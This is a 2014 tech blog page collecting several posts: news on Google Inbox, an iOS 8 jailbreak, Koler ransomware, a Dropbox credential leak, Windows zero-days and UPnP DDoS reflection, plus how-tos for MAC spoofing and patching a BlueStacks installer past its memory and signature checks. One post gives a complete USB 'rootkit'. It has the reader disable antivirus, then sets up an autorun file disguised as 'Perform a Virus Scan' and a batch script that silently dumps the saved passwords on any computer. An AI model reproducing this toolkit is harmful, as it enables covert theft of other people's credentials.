Sunday, 26 October 2014

Google Launches User-Friendly 'Inbox' App, Alternative To Gmail


Google is offering its users a completely new and better experience of its mailing service. And in an effort to do this, the company has launched a new email service, an alternative to Gmail, called "Inbox" on Wednesday that aims to make email more useful and preview next-generation capabilities.
Inbox will not replace Gmail, the company's popular 10-year-old email product, instead it will sit next to its Gmail service and will provide users' better organize their emails with live alerts for appointments, flight bookings and package deliveries in a more user-friendly way.
"Years in the making, Inbox is by the same people who brought you Gmail, but it's not Gmail: it's a completely different type of inbox, designed to focus on what really matters," wrote Sundar Pichai, Google’s senior vice president of Android, Chrome and apps, in a blog post.
According to the company, the Inbox service was designed to deal with the problem of getting too much email, in which the important and most urgent messages get lost amidst junk messages and endless threads.

Inbox solves this problem and displays only real-time updates to emails - for example, showing the delivery status of items bought online, showing reminders in a more accessible way that allows users to more easily keep track of their important chores and appointments.
"With this evolution comes new challenges: we get more email now than ever, important information is buried inside messages, and our most important tasks can slip through the cracks—especially when we’re working on our phones," the company noted. "For many of us, dealing with email has become a daily chore that distracts from what we really need to do—rather than helping us get those things done."
Other Features Inbox Include:
  • Organising custom message bundles - from bank statements and online shopping purchases to travel reservations, to reduce inbox clutter.
  • Speed dialing a friend with a red + button.
  • Pin items to come back and address.
  • Marking tasks as done by swiping to right.
  • Find travel docs, photos and other critical information without opening the email.
Video Demonstration:
You can also have a look to its video demonstration:



The tech giant has made the new Inbox app available on the Web as well as on Android smartphones and iPhones, but we have access to the limited release, as it is being distributed via Google's tried-and-true invite system.
The company sent out invitations to selected Gmail users to try out the new service, but users were allowed to email the company at inbox@google.com to get an invitation. Inbox app is available on Google Play Store and it also appears to be on the iOS App Store.

Jailbreak iOS 8 And iOS 8.1 Untethered Using 'Pangu' Jailbreak Tool

 
Good news for iOS 8.1 users! The Chinese jailbreaking team Pangu has released a software tool that allows users to Jailbreak their iPhones, iPads and iPods running the latest version of Apple's mobile operating system, iOS 8 and iOS 8.1.
That was really very quick, as iOS users need to wait quite long for the jailbreaks. Pangu developer team is the same group responsible for jailbreaking iOS 7 few months back.
The group made its jailbreak tool available by releasing a download link for the developers edition before quickly removing it. The link for the tool on Pangu’s site is currently unavailable, with the team noting on their official Twitter account that, "Current Pangu Jailbreak v1.0.0 is disabled remotely because we are fixing bug which may cause lost of your photos. Please wait …"
The developer edition of the jailbreak iOS 8 tool didn’t come with the Cydia app store, which would make the tool useless for an average iOS users who likes jailbreaking their phones to install unauthorized tweaks. Therefore iOS jailbreak fans have to wait for a bit for the wide release date with Cydia support.

The Pangu group has released the iOS 8.1 jailbreak tool only for the Windows systems right now, and a Mac OS X release should follow soon. Moreover, there is no English version of the tool, it’s available only in Chinese language so you’ll have to wing it if you don’t know the language.
According to a thread on Reddit, Cydia developer, Jay Freeman (@Saurik) is currently working on making it compatible with this jailbreak.
"So, windknown has contacted me, about a half hour ago, via e-mail. He has told me one of the issues that is keeping Substrate from working on the device, which will probably require me to build a little binary patch for dyld as part of the Substrate installation sequence," Saurik wrote.
Those not familiar with the Jailbreaking, it is a process of removing limitations on iOS devices, Apple's operating system, so you can install third party software not certified by Apple. Such devices include the iPhone, iPod touch, iPad, and second-generation Apple TV.
The group has promised that their iOS 8 jailbreak tool successfully works on all iOS 8 and iOS 8.1 devices including iPhone 6, iPhone 6 Plus, iPad mini 3, and iPad Air 2, as well as earlier devices such as the iPhone 5s and iPad Air.
Since many of the standard tools for users aren’t available at the moment for iOS 8, so we recommend you to wait for the wide release jailbreak tool with Cydia support. As soon as we get some more details on exactly when the Pangu iOS 8.1 jailbreak will be released we will update the story.

Twitter Launches Digits – A Password Free Login Service For App Developers

 
There’s a good news for app developers. On Wednesday at Twitter’s first annual developer conference Flight, the company announced a new tool for developers which will allow users to log-in to mobile applications using their phone numbers rather than a traditional username and password combinations.
SAY NO TO PASSWORD
The service will be called Digits, aimed at application developers looking for an easier, password-free login option for their mobile applications – in a similar way to Snapchat, WhatsApp and Viber that rely only on verified users’ mobile numbers for sign-in, rather than the traditional ID and password combination.
"This is an entirely new native mobile sign up service that makes mobile-first sign-up frictionless, and creates an identity relationship entirely between you and your users," said Twitter CEO Dick Costolo, speaking at the Twitter Flight developer conference in San Francisco.

DEVELOPERS DON’T TRUST TWITTER
On one hand, where other social networking companies encouraged third-party developers to develop their own applications and services on top of the platform. Twitter always tried to reassert control over its product and platform and therefore being hated by developer community, but this new move will definitely solve this all.
According to the app developer Marco Arment, Twitter can’t be trusted again. "We’re just innocent bystanders getting hit whenever this fundamentally insecure, jealous, unstable company changes direction, which happens every few years," wrote Arment, who most recently developed Overcast, an app for listening to podcasts. "Twitter will never, and should never, have any credibility with developers again."
HOW DIGITS WORKS
Basically, Digits uses SMS messages to control access to registered accounts. When a developer adds Digits to its application, the user will be able to sign-in to that application using his or her mobile phone number.
Once the user provides the mobile phone number, Twitter will send a verification code on the provided mobile number via an SMS. User then enters that the SMS-based confirmation code to the log-in, and have access to the application. Note that each code Twitter sends you via SMS will expire after it's used. The process is just like a two-step verification one. 
 
 

Koler Android Ransomware Learns to Spread via SMS

 
Users of Android operating system are warned of a new variant of Android malware Koler that spreads itself via text message and holds the victim’s infected mobile phone hostage until a ransom is paid.
Researchers observed the Koler Android ransomware Trojan, at the very first time, in May when the Trojan was distributed through certain pornographic websites under the guise of legitimate apps. It locks the victim’s mobile screen and then demands money from users with fake notifications from law enforcement agencies accusing users of viewing and storing child pornography.
ANDROID SMS WORM
Recently, researchers from mobile security firm AdaptiveMobile has discovered a new variant of the rare piece of mobile malware – named Worm.Koler – that allows the malware to spread via text message spam and attempts to trick users into opening a shortened bit.ly URL, turning Koler into an SMS worm.

Once the device is infected by the Koler variant, it will first send an SMS message to all contacts in the device's address book with a text stating, "Someone made a profile named -[the contact's name]- and he uploaded some of your photos! is that you?" followed by a Bitly link, according to the security firm.
When a victim clicks on the Bitly link, he or she is then redirected to a Dropbox page with a download link for a 'PhotoViewer' app that, if installed, will push a ransom screen to pop up incessantly on the users' screen. The ransom message reads that the device has been locked up because of having illicit content and users must pay $300 via MoneyPak to 'wave the accusations.'
"The device appears to be completely locked down with the screen on the phone blocked, so the user won't be able to close the window, or deactivate the malware through the app manager," reads the blog post. "The victim is forced to buy a voucher as instructed on the blocking page, and send the voucher code to a malware author."
INFECTION SPREADING RAPIDLY
The Worm.Koler is capable of displaying localized ransomware messages to users from at least 30 countries, including the U.S., where three quarters of the latest Koler variant infections were seen by the firm, and smaller number of infections were also being detected in parts of the Middle East.
"Due to the Worm.Koler's SMS distribution mechanism, we are seeing a rapid spread of infected devices since the 19th of October, which we believe to be the original outbreak date," the blog post states. "During this short period, we have detected several hundred phones that exhibit signs of infection, across multiple US carriers. In addition to this, other mobile operators worldwide—predominantly in the Middle East, have been affected by this malware."
HOW TO PROTECT YOURSELF
If users suspect they are infected by the malware, they should never authorize any payment as it won't guarantee the unlocking of your device, as well as it will further encourage cyber criminals to carry out such ransomware practices again and again.
Koler does not encrypt files, according to the security firm, therefore it becomes easy for users to eliminate the threat from their infected devices by following two simple steps:
  • Reboot your phone in the "Safe Mode"
  • Remove the 'PhotoViewer' app using standard Android app uninstallation tool
In order to protect yourself from such threats in future, the best practice is to have the "Unknown Sources" option turned off in your Android device' security settings menu. Turning off of this option won't let users to install applications from unknown sources, but only from the official Google Play store.

How To Run Android Apps On Computer/Laptop


What is a bluestack

BlueStacks App Player lets you run your favorite mobile
apps fast and fullscreen in your browser and on PC or Mac.

What will I need?

The tools or rather software that you need is a simple Android emulator for PC/Mac. The one we’ll be using is the well-known BLUESTACK App Player you can download from the link provided below.

                                            Download Here

.

Your system must have a 1GB+ RAM for running the emulator. Good graphics card and processor will obviously result in better rendering but a simple one would also do. Mac OS X or PC with XP SP3, Vista, 7 and 8 are supported.


    .                            

How to Spoof MAC Address on Android Phones



Media Access Control address (MAC address) is a 12-character unique identifier assigned to a specific piece of hardware such as the network adapter of your WiFi device. In simple words, a MAC address can be used to uniquely identify your Android phone on the Internet or the local network.

Spoofing MAC Address on Android Devices

Even though MAC address is embedded on the hardware device during manufacture, it can still be spoofed to input a new one of your choice. Here is a detailed instruction on how to spoof MAC address on your Android phone.
Before you spoof the MAC address, you need to record the original/current MAC address of your device which can be done according to the instruction below:
  • On the Home Screen of your phone, tap Menu button and go to Settings.
  • Tap About Device and go to Status
Now scroll down to record the 12-digit code shown under Wi-Fi Mac address. An address would read something like:
                           Example MAC address: B8-70-F4-12-E6-03


Requirements for Spoofing the MAC Address

  1. Rooted Android Phone
  2. BusyBox app installed on your phone
  3. Once BusyBox is installed, you need to install Terminal app
Once the above requirements are satisfied, follow the instructions below to spoof your MAC address:
  1. Open the Terminal app and type the commands as listed below:
                        $ su [HIT ENTER]
                        $ busybox iplink show eth0 [HIT ENTER]
           (This will show your current MAC address, just for your confirmation)
      2. Now, type the following command:

                          $ busybox ifconfig eth0 hw ether XX:XX:XX:XX:XX:XX [HIT ENTER]

(In the above command, replace XX:XX:XX:XX:XX:XX with your new MAC address)
  1. You have now spoofed your MAC address successfully. To check for the change enter the following command again:
                              $ busybox iplink show eth0 [HIT ENTER]

(Now you should see your new MAC address)

How to sniff Passwords using USB Drive




As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox.

There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.


Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.


IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more.


PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:

Record Index, Web Site, User Name, Password, User Name Field and Password Field.

Preparing Your USB Drive for Password Hacking:

Here is a step by step procedure to create the password hacking toolkit:

You must temporarily disable your antivirus before following these steps.

1.Download all the 5 tools, extract them and copy only the executable files  
(.exe files) onto your USB Pendrive.

     ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe 
into your  USB Drive.

2.Create a new Notepad and write the following text into it:

[autorun] open=launch.bat
ACTION= Perform a Virus Scan

  save the Notepad and rename it from New Text Document.txt to autorun.inf.  Now copy the autorun.inf file onto your USB pen-drive.

3. Create another Notepad and write the following text onto it:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive.


Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen-drive on on any computer to sniff the stored passwords. Just follow these steps:


1.Insert the pen-drive and the auto-run window will pop-up. (This is because,
 we have created an auto-run pen-drive).


2. In the pop-up window, select the first option (Perform a Virus Scan).


3. Now all the password recovery tools will silently get executed in the background 
 (This process takes hardly a few seconds).  The passwords get stored in the .TXT files.


Remove the pen-drive and you’ll see the stored passwords in the .TXT files.

Nearly 7 Million Dropbox Account Passwords Allegedly Hacked


Internet users have faced a number of major privacy breaches in last two months. Major in the list are The FappeningThe Snappening and now the latest privacy breach in Dropbox security has gained everybody’s attention across the world.

Dropbox, the popular online locker service, appears to have been hacked by an unnamed hacker group. It is still unclear how the account details of so many users were accessed and, indeed, if they are actually legitimate or not. However, the group claims to have accessed details from nearly 7 million individual accounts and are threatening to release users’ photos, videos and other files.

HACKERS CLAIMED TO RELEASE 7 MILLION USERS’ PERSONAL DATA
A thread surfaced on Reddit today that include links to files containing hundreds of usernames and passwords for Dropbox accounts in plain text. Also a series of posts with hundreds of alleged usernames and passwords for Dropbox accounts have been made to Pastebin, an anonymous information-sharing site.

Hackers have already leaked about 400 accounts by posting login credentials, all starting with the letter B, and labelled it as a "first teaser...just to get things going". The perpetrators are also promising to release more more password details if they're paid a Bitcoin ransom.
"More Bitcoin = more accounts published on Pastebin. As more BTC is donated, More pastebin pastes will appear."
The security breach in Dropbox would definitely have bothered its millions of users and since passwords are involved in this incident, so it has more frightening consequences on its users. Reddit users have tested some of the leaked username and password combinations and confirmed that at least some of them work.

DROPBOX DENIED THE HACK - THIRD PARTY IS RESPONSIBLE
However, Dropbox has denied it has been hacked, saying the passwords were stolen apparently from third-party services that users allowed to access their accounts. In a statement to The Next Web, Dropbox said:
"Dropbox has not been hacked. These usernames and passwords were unfortunately stolen from other services and used in attempts to log in to Dropbox accounts. We'd previously detected these attacks and the vast majority of the passwords posted have been expired for some time now. All other remaining passwords have expired as well."
The incident came just few days after the Snappening incident in which the personal images of as much as100,000 Snapchat users were leaked online, which was the result of a security breach in the its third-party app.

Snapchat has denied that its service or server was ever compromised, but the servers of a third-party app designed to save Snapchat photos, which became the target for hackers to obtain personal photographs.

DROPBOX - "HOSTILE TO PRIVACY" SAYS SNOWDEN
Dropbox was in the news earlier this week when, in a recent interview with The Guardian, NSA whistleblowerEdward Snowden called Dropbox a "targeted, wannabe PRISM partner" that is "very hostile to privacy" — referring to its ability to access your data itself, which is yet another security consideration when it comes to web services.

Snowden suggested web users to stop using Dropbox and warned them that the cloud storage service does not safeguard users’ privacy because it holds encryption keys and can therefore be forced by governments to hand over the personal data they store on its servers. He suggested people to use an alternative cloud storage provider that do not store any encryption keys, so that the users’ data cannot be read by anyone.
USERS ARE ADVISED TO CHANGE PASSWORDS
Until the full scope of the problem is known, it’s probably worthwhile changing your password. But whether the attack is confirmed or not, it’s a good idea to change your password just to be on a safer side — especially for those users who use same password for multiple services.

Users are also recommended to turn on two-factor authentication, which Dropbox now supports and install a time-based, one-time password app on a mobile device.

Update: Dropbox has issued a statement on its blog further clarifying that the Dropbox passwords were stolen from "unrelated services."
"The usernames and passwords...were stolen from unrelated services, not Dropbox," the company said in a blog post. "Attackers then used these stolen credentials to try to log in to sites across the internet, including Dropbox. We have measures in place that detect suspicious login activity and we automatically reset passwords when it happens."
"Attacks like these are one of the reasons why we strongly encourage users not to reuse passwords across services. For an added layer of security, we always recommend enabling 2 step verification on your account."

Microsoft Patches 3 Zero-day Vulnerabilities actively being Exploited in the Wild


As part of monthly patch update, Microsoft released eight security bulletins on Tuesday that address dozens of vulnerabilities including a zero-day flaw reportedly being exploited by Russian hackers to target NATO computers and a pair of zero-day Windows vulnerabilities that attackers have been exploiting to penetrate major corporations' networks.

Just a day before yesterday, our team reported you about a Zero-day vulnerability discovered by the cyber intelligence firm iSight Partners affecting all supported versions of Microsoft Windows and is being exploited in a five-year old cyber-espionage campaign against the Ukrainian government and U.S organisations.

Researchers at FireEye found two zero-day flaws, used in separate, unrelated attacks involving exploitation of Windows kernel, just a day after iSight partners disclosed zero-day in Windows. The pair of zero-day vulnerabilities could allow an attacker to access a victim's entire system.

According to the researchers at FireEye, the two of three so-called zero-day flaws are being actively exploited in the wild by hackers and are being used as "part of limited, targeted attacks against some major corporations."

Microsoft updates for the month of October 2014 Patch Tuesday address several vulnerabilities in all currently supported versions of Windows, Internet Explorer, Office, Sharepoint Server and the .Net framework. Three of the bulletins are marked "critical" and rest are "important" in severity. Systems administrators are recommended to apply the patches immediately for the critical updates.

The zero-day flaw (CVE-2014-4114) discovered by iSight partners in all supported versions of Microsoft Windows and Windows Server 2008 and 2012 that is being exploited in the "Sandworm" cyberattack, are patched as part of MS14-060. Microsoft rated Bulletin MS14-060 as important rather than critical because it requires a user to open a Microsoft Office file to initiate the remote code execution.
"The vulnerability [exists in Windows OLE] could allow remote code execution if a user opens a Microsoft Office file that contains a specially crafted OLE object," Microsoft warned in its bulletin. "An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user." (OLE is Microsoft technology for creating complex documents that contain a combination of text, sound, video and other elements.)
However, the two zero-days discovered by FireEye are patched as part of MS14-058 and are marked critical. They are designated CVE-2014-4148 and CVE-2014-4113.
"We have no evidence of these exploits being used by the same actors. Instead, we have only observed each exploit being used separately, in unrelated attacks,FireEye explained.
CVE-2014-4148 exploits a vulnerability in TrueType Font (TTF) processing. TTF processing is performed in kernel mode as part of the GDI and has been the source of critical vulnerabilities in the past as well.

The vulnerability affects Windows 8.1/Windows Server 2012 R2, Windows 8/Windows Server 2012, Windows 7/Windows Server 2008 R2 (Service Pack 0 and 1) and Windows XP Service Pack 3. It affects both 32-bit and 64-bit versions of the Operating System, but the attacks have only been observed against 32-bit systems.

However, CVE-2014-4113 is a local Elevation of Privilege (EoP) vulnerability that affects all versions of Windows including Windows 7, Vista, XP, Windows 2000, Windows Server 2003/R2, Windows Server 2008/R2, Windows 8.x and Windows Server 2012/R2.

Out of remaining bulletins, two are rated critical, both address remote code execution vulnerability in Internet Explorer and Microsoft .NET Framework respectively. Remaining bulletins are rated important in severity, include elevation of privilege bugs, Security Feature Bypass, and a remote code execution flaw.

How to install Bluestacks with 1 GB RAM & Without Graphic Card



It is quite simple to install Bluestacks with 1 GB RAM or without Graphic card. You just need to tweak some settings Bluestacks installer so that it can bypass the verification test of 2 GB RAM. It would then successfully be installed in your 1 GB RAM PC. Below is the  detailed step-by-step procedure install Bluestacks in your low specs system:

Steps to install Bluestacks in low specs system:

  • At first, download Bluestacks Offline installer from this page – Download Bluestacks Offline installer.HERE
NOTE: This trick only works on Offline installer not on Split installer.
  • Now, download and install Orca Software from this link – Download Orca.
  • After finishing the installation of Orca, go to the Bluestacks offline installer file which you have downloaded from the above link.
  • Right click on the  Bluestacks offline installer file and select “Edit with Orca” as shown in the below image





  • It would open the window of Orca. Click on “Launch Condition” on your left side and select “Installed OR Physical Memory >= 1024” Condition as shown in the below image. Delete this option and press OK.


_Installed OR PhysicalMemory Option_
  • Now, go to “InstallExecuteSequence” and select “CheckMsiSignature” as shown in the below image. Delete this option also and press OK.



_CheckMsiSignature Option
  • Now, go to “Property” and double click on the “TRUE” value of GLMODE. Replace it with FALSE and press Enter.
GLMODE Option

  • Now, Click on the Save button icon and close Orca software.


  • That’s it you are done. Now, try installing Bluestacks from the saved Offline installer setup file. Hopefully, it will run in your system successfully this time.


Facebook “Safety Check” Allows You to Connect with Family during Natural Disasters


The tool, named "Safety Check," will soon be available globally to over 1.32 billion Facebook users on Android, iOS, feature phones and the desktops. The tool is designed to be activated after a natural disaster and by using either the city you lived in or your last location - if you have checked in on “Nearby Friends”, it let’s you alert your friends and family that you are safe, while also tracking the status of others.
In times of disaster or crisis, people turn to Facebook to check on loved ones and get updates,” wrote the company in a blog post about the feature. “It is in these moments that communication is most critical both for people in the affected areas and for their friends and families anxious for news.
According to Facebook, this new move is in sake of 2011 earthquake and tsunami disaster took place in Japan when a deadly tsunami set off 30-foot tidal waves that crashed into the shores of Japan, flooding entire cities and damaging nuclear power plants, where Facebook emerged out to be an effective tool in connecting loved ones and notifying family members of their safety.
Our engineers in Japan took the first step toward creating a product to improve the experience of reconnecting after a disaster,” the company wrote. “They built the Disaster Message Board to make it easier to communicate with others. They launched a test of the tool a year later and the response was overwhelming.
In disaster situation, this tool offers you a simple but an effective way to notify your family and friends about your situation by just clicking on a simple I'm safe / I'm not option, which will push a notification and news feed story that is visible only to people on your friends list.
If you have activated the tool, you will also receive a notification about friends who have marked themselves as safe too.

If you’re ever in a situation that would require you to use Safety Check, we hope it’s a tool that helps you stay connected to those you care about, and gives you the comfort of knowing your loved ones are safe.
You can also have a look on the demo video of Safety Check, which explains how the tool works.

Reflection DDoS Attacks Using Millions of UPnP Devices on the Rise



After successful in launching reflection and amplification Distributed Denial-of-Service (DDoS) attacks by abusing various protocols such as DNS, NTP and SMTP, hackers are now abusing Simple Service Discovery Protocol (SSDP) – part of the UPnP protocol standard – to target home and office devices, researchers warned.

SSDP is a network protocol based on the Internet Protocol Suite that comes enabled on millions of networked devices, such as computers, printers, Internet gateways, Router / Wi-Fi access points, mobile devices, webcams, smart TVs and gaming consoles, to discover each other and automatically establish working configurations that enable data sharing, media streaming, media playback control and other services.

FLAW IN UPnP USED IN AMPLIFICATION DDoS ATTACK
Prolexic Security Engineering & Response Team (PLXsert) at Akamai Technologies have issued a warningthat the devices use in residential or small office environments are being co-opted into reflection and amplification distributed denial-of-service (DDoS) attacks since July that abuse communications protocols enabled on UPnP devices.
"The rise of reflection attacks involving UPnP devices in an example of how fluid and dynamic the DDoS crime ecosystem can be in identifying, developing and incorporating new resources and attack vectors into its arsenal," the advisory states. "Further development and refinement of attack payloads and tools is likely in the near future."
The weakness in the Universal Plug-and-Play (UPnP) standard could allow an attacker to compromise millions of its consumer and business devices, which could be conscripted by them to launch an effective DDoS attack on a target.

Attackers have found that Simple Object Access Protocol (SOAP) – protocol used to exchange sensitive information in a decentralized, distributed environment – requests “can be crafted to elicit a response that reflects and amplifies a packet, which can be redirected towards a target.”

This UPnP attack is useful for both reflection attacks, given the number of vulnerable devices, and amplification as researchers estimate that it can magnify attack traffic by a factor of 30, according to the advisory.

OVER 4.1 MILLIONS DEVICES VULNERABLE
According to the security researchers, about 38 percent of the 11 million Internet-facing UPnP devices, i.e. over 4.1 million devices, in use are potentially vulnerable to being used in this type of reflection DDoS attack.
"The number of UPnP devices that will behave as open reflectors is vast, and many of them are home-based Internet-enabled devices that are difficult to patch," said Akamai security business unit senior vice president and general manager Stuart Scholly. "Action from firmware, application and hardware vendors must occur in order to mitigate and manage this threat."
MAJOR TARGETED COUNTRIES
South Korea has the largest number of vulnerable devices, followed by the United States, Canada, and China, according to the advisory.

This isn’t the first time when a security flaw in UPnP has allowed attackers to target home and business devices, back in January 2013, a flaw in UPnP exposed more than 50 millions computers, printers and storage drives to attack by hackers remotely.